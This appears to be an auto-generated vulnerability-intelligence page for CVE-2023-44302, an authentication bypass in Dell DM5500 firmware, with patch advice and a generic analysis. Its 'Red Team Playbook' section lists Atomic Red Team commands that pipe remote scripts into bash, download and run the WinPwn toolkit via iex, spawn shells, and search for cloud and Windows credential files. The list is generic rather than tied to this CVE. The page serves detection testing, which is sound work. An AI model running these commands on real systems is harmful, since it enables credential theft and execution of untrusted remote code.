CVE-2023-44302
Overview
This vulnerability is an improper authentication flaw affecting the Dell PowerProtect Data Manager DM5500 Appliance firmware versions 5.14.0.0 and earlier. The root cause lies in the failure to enforce adequate authentication controls on specific management interfaces, allowing unauthorized access to protected resources. The affected component is the appliance's firmware authentication mechanism, which does not properly validate user credentials before granting access to sensitive functionality.
Vulnerability Description
Dell DM5500 5.14.0.0 and prior contain an improper authentication vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability to gain access of resources or functionality that could possibly lead to execute arbitrary code.
Impact
An attacker with network access can exploit this vulnerability without any authentication or user interaction, as indicated by the CVSS vector (AV:N/AC:H/PR:N/UI:N). Successful exploitation enables the attacker to access restricted resources and functionality, potentially leading to execution of arbitrary code on the appliance. This can result in unauthorized control over the device, data compromise, and disruption of backup and recovery operations, impacting business continuity and data integrity.
Solution
Dell has released a security update addressing this vulnerability in the PowerProtect Data Manager DM5500 Appliance firmware. Users should upgrade to the latest firmware version beyond 5.14.0.0 as specified in Dell Security Advisory DSA-2023-425 (https://www.dell.com/support/kbdoc/en-us/000220107/dsa-2023-425-security-update-for-dell-powerprotect-data-manager-dm5500-appliance-for-multiple-vulnerabilities). Following the vendor's patch instructions is recommended to remediate this issue effectively.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The improper authentication vulnerability present in the Dell DM5500 firmware version 5.14.0.0 and earlier versions poses a significant risk to the security of systems utilizing this product. This flaw allows an unauthenticated remote attacker to bypass authentication mechanisms, potentially granting unauthorized access to sensitive resources or functionalities. The underlying issue stems from inadequate validation of user credentials, which could lead to unauthorized execution of commands or access to data that should be protected. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating a critical level of risk that organizations must address promptly.
Attack vectors for this vulnerability are particularly concerning due to the remote nature of the exploitation. An attacker could leverage this flaw to gain access to the management interface of the affected product without needing valid credentials. Once inside, the attacker could manipulate system settings, exfiltrate sensitive data, or even execute arbitrary code, leading to a complete compromise of the affected system. Exploitation scenarios could range from targeted attacks against specific organizations to widespread automated attacks that scan for vulnerable systems. The potential for such exploitation highlights the need for vigilance in monitoring and securing networked environments where this product is deployed.
The real-world impact of this vulnerability can be profound, especially for organizations relying on the Dell DM5500 for data management and protection. Unauthorized access could result in data breaches, loss of intellectual property, or disruption of critical services. The business risks associated with such incidents include financial losses, regulatory penalties, and damage to reputation. Furthermore, the potential for an attacker to execute arbitrary code could lead to the deployment of malware or ransomware, exacerbating the situation and increasing recovery costs. Organizations must recognize that the implications of this vulnerability extend beyond immediate technical concerns, affecting overall business continuity and stakeholder trust.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. Regularly updating firmware to the latest version is crucial, as vendors often release patches to address known vulnerabilities. Additionally, organizations should employ network segmentation to limit the exposure of critical systems and implement robust access controls to minimize the risk of unauthorized access. Intrusion detection systems (IDS) can be deployed to monitor for unusual activity that may indicate exploitation attempts. Regular security assessments and penetration testing can also help identify weaknesses in the system and ensure that security measures are effective.
In conclusion, the improper authentication vulnerability in the Dell DM5500 firmware represents a critical threat that requires immediate attention from affected organizations. By understanding the technical details, potential attack vectors, and real-world implications, businesses can better prepare themselves to defend against this and similar vulnerabilities. Proactive detection and mitigation strategies will be essential in safeguarding sensitive data and maintaining operational integrity in an increasingly complex cybersecurity landscape.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dell | Powerprotect Data Manager Dm5500 Firmware | All |
cpe:2.3:o:dell:powerprotect_data_manager_dm5500_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-44302 |
| dell.com |
GitHub CVE
vendor-advisory
|
https://www.dell.com/support/kbdoc/en-us/000220107/dsa-2023-425-security-update-for-dell-powerprotect-data-manager-dm5500-appliance-for-multiple-vulnerabilities |